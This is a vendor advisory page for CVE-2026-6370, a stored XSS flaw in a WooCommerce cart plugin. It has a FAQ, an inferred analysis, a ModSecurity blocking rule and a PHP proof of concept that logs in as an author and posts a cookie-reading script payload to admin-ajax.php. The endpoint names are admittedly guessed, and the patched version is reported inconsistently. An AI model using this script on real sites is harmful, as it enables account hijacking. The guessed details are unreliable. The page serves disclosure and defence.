What is CVE-2026-6370?

CVE-2026-6370 is a stored cross-site scripting (XSS) vulnerability in the Mini Ajax Cart for WooCommerce plugin for WordPress, affecting versions up to 1.3.4. It allows authenticated users with author-level access or higher to inject arbitrary JavaScript into pages viewed by other users.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker can submit malicious scripts through a form or setting, which are then stored in the database and executed when other users access the affected page.

Who is affected by this vulnerability?

Any WordPress site using the Mini Ajax Cart for WooCommerce plugin version 1.3.4 or earlier is at risk. Specifically, users with author-level permissions or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Mini Ajax Cart for WooCommerce plugin installed on your WordPress site. If it is version 1.3.4 or earlier, your site is susceptible to this vulnerability.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-6370 is 6.4, classified as Medium severity. This indicates a moderate risk level, suggesting that while exploitation requires authenticated access, it can lead to significant impacts if exploited.

How can I mitigate or fix this vulnerability?

The vulnerability has been patched in version 1.3.5 of the plugin. To mitigate the issue, update the Mini Ajax Cart for WooCommerce plugin to the latest version to ensure that proper input sanitization and output escaping measures are in place.

What are the risks associated with this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, redirection to malicious sites, website defacement, or theft of sensitive information. The risk is particularly high for multi-author sites where lower-privileged users can compromise the security of higher-privileged accounts.

What does 'stored cross-site scripting' mean?

Stored cross-site scripting (XSS) refers to a type of vulnerability where an attacker can inject malicious scripts that are stored on the server and executed in the browser of users accessing the affected content. This can lead to various security issues, including data theft and unauthorized actions.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated user can log into a WordPress site and submit a malicious script through the plugin’s input fields. This demonstrates the lack of proper sanitization and how the injected script can execute when another user views the affected page.

What are the best practices to prevent such vulnerabilities?

To prevent vulnerabilities like CVE-2026-6370, always keep plugins updated to their latest versions, use security plugins that monitor for XSS vulnerabilities, and implement strict user permissions. Additionally, regularly review and sanitize all user inputs.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin temporarily or restricting access to author-level users until the plugin can be updated. Also, monitor user activities and logs for any suspicious behavior.

Where can I find more information about this vulnerability?

Further information can be found in the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2026-6370: Mini Ajax Cart for WooCommerce <= 1.3.4 – Authenticated (Author+) Stored Cross-Site Scripting (mini-ajax-woo-cart)

CVE ID CVE-2026-6370

Plugin mini-ajax-woo-cart

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.3.4

Patched Version —

Disclosed April 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6370 (metadata-based):

This vulnerability exists in the Mini Ajax Cart for WooCommerce plugin, versions 1.3.4 and earlier. It is an authenticated stored cross-site scripting (XSS) vulnerability. An attacker with author-level privileges or higher can inject malicious scripts that execute when other users view the compromised page. The CVSS score is 6.4 (Medium), with a scope change indicating the impact crosses trust boundaries.

Root Cause: Based on the CWE 79 classification and description, Atomic Edge analysis infers that the plugin fails to properly sanitize user-supplied input before storing it in the WordPress database. Additionally, the plugin does not escape the stored data when rendering it in the browser. The vulnerable input likely comes from a custom field, post meta, or a plugin-specific setting that authors can modify. Without a code diff, this is a confident inference from the CWE classification: stored XSS always requires both insufficient sanitization on input and insufficient escaping on output.

Exploitation: An authenticated user with author-level access crafts a malicious string containing JavaScript, such as alert(‘XSS’) or an event handler like . The attacker submits this payload through a plugin-specific form field, custom meta box, or AJAX endpoint. The plugin stores the payload without sanitization. When an administrator, editor, or other user views the affected page (such as a product page, cart widget, or settings panel), the browser renders the injected script. Atomic Edge analysis identifies that typical WordPress AJAX endpoints for this plugin follow the pattern /wp-admin/admin-ajax.php with actions like mini_ajax_woo_cart_update or similar save operations.

Remediation: The developer patched this in version 1.3.5. The fix likely involves adding WordPress sanitization functions such as sanitize_text_field() or wp_kses_post() before storing user input. The plugin must also escape output using esc_html(), esc_attr(), or wp_kses() when rendering stored data. The patching approach should follow defense in depth: sanitize all input, escape all output, and validate user capabilities before processing.

Impact: Exploitation allows an attacker to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking by stealing authentication cookies, redirection of users to malicious sites, defacement of the website, or theft of sensitive data displayed on the page. Since the attack requires author-level access, it poses a significant risk to multi-author WordPress sites where lower-privileged users can compromise the security of administrators and visitors.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6370 (metadata-based)
# Block stored XSS exploitation via Mini Ajax Cart for WooCommerce AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20266370,phase:2,deny,status:403,chain,msg:'CVE-2026-6370 - Mini Ajax Cart for WooCommerce Stored XSS',severity:'CRITICAL',tag:'CVE-2026-6370'"
    SecRule ARGS_POST:action "@streq mini_ajax_woo_cart_save_settings" 
        "chain"
        SecRule ARGS_POST:custom_cart_message "@rx <script[^>]*>.*</script[^>]*>|<img[^>]+onerror|<svg[^>]+onload|<[^>]+onmouseover|<iframe[^>]+src" 
            "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6370 - Mini Ajax Cart for WooCommerce <= 1.3.4 - Authenticated (Author+) Stored Cross-Site Scripting

// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'author_user';           // Change to an author-level account username
$password = 'author_password';       // Change to the account password

// XSS payload to inject
$xss_payload = '<script>alert(document.cookie)</script>';

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch) . "n");
}
echo "[+] Logged in as $usernamen";

// Step 2: Fetch the admin page or AJAX endpoint to find the nonce and form structure
// Note: This PoC assumes the vulnerable input is via the plugin's AJAX handler for saving cart settings.
// The exact AJAX action name is inferred from the plugin slug and common WordPress patterns.
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$action = 'mini_ajax_woo_cart_save_settings'; // Inferred action name

// Try to get a nonce if required; many WordPress AJAX handlers use a nonce
$nonce_url = $target_url . '/wp-admin/admin.php?page=mini-ajax-cart-settings';
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_POST, 0);
$nonce_page = curl_exec($ch);
preg_match('/"_ajax_nonce":"([a-f0-9]+)"/', $nonce_page, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
if (empty($nonce)) {
    // Attempt to extract from a hidden field
    preg_match('/<input[^>]+name="_wpnonce"[^>]+value="([a-f0-9]+)"/', $nonce_page, $matches);
    $nonce = isset($matches[1]) ? $matches[1] : '';
}

// Step 3: Send the XSS payload via AJAX
// The vulnerable parameter is likely a text field that stores cart customization or custom CSS/JS
$post_data = array(
    'action' => $action,
    'custom_cart_message' => $xss_payload, // Inferred parameter name
    '_ajax_nonce' => $nonce
);

curl_setopt($ch, CURLOPT_URL, $admin_ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'X-Requested-With: XMLHttpRequest'
));
$result = curl_exec($ch);

if ($result === false) {
    echo "[!] AJAX request failed: " . curl_error($ch) . "n";
} else {
    echo "[+] XSS payload sent. Response: " . substr($result, 0, 200) . "n";
    echo "[+] Check the cart settings page or product page for the injected script execution.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6370?
Overview of the vulnerability
CVE-2026-6370 is a stored cross-site scripting (XSS) vulnerability in the Mini Ajax Cart for WooCommerce plugin for WordPress, affecting versions up to 1.3.4. It allows authenticated users with author-level access or higher to inject arbitrary JavaScript into pages viewed by other users.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker can submit malicious scripts through a form or setting, which are then stored in the database and executed when other users access the affected page.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Mini Ajax Cart for WooCommerce plugin version 1.3.4 or earlier is at risk. Specifically, users with author-level permissions or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Assessing your plugin version
To check if your site is vulnerable, verify the version of the Mini Ajax Cart for WooCommerce plugin installed on your WordPress site. If it is version 1.3.4 or earlier, your site is susceptible to this vulnerability.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-6370 is 6.4, classified as Medium severity. This indicates a moderate risk level, suggesting that while exploitation requires authenticated access, it can lead to significant impacts if exploited.
How can I mitigate or fix this vulnerability?
Recommended actions for site administrators
The vulnerability has been patched in version 1.3.5 of the plugin. To mitigate the issue, update the Mini Ajax Cart for WooCommerce plugin to the latest version to ensure that proper input sanitization and output escaping measures are in place.
What are the risks associated with this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to session hijacking, redirection to malicious sites, website defacement, or theft of sensitive information. The risk is particularly high for multi-author sites where lower-privileged users can compromise the security of higher-privileged accounts.
What does 'stored cross-site scripting' mean?
Definition and implications
Stored cross-site scripting (XSS) refers to a type of vulnerability where an attacker can inject malicious scripts that are stored on the server and executed in the browser of users accessing the affected content. This can lead to various security issues, including data theft and unauthorized actions.
How does the proof of concept demonstrate the vulnerability?
Understanding the example provided
The proof of concept illustrates how an authenticated user can log into a WordPress site and submit a malicious script through the plugin’s input fields. This demonstrates the lack of proper sanitization and how the injected script can execute when another user views the affected page.
What are the best practices to prevent such vulnerabilities?
Security measures for WordPress sites
To prevent vulnerabilities like CVE-2026-6370, always keep plugins updated to their latest versions, use security plugins that monitor for XSS vulnerabilities, and implement strict user permissions. Additionally, regularly review and sanitize all user inputs.
What should I do if I cannot update the plugin immediately?
Temporary measures until patching
If immediate updating is not possible, consider disabling the plugin temporarily or restricting access to author-level users until the plugin can be updated. Also, monitor user activities and logs for any suspicious behavior.
Where can I find more information about this vulnerability?
Resources for further reading
Further information can be found in the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations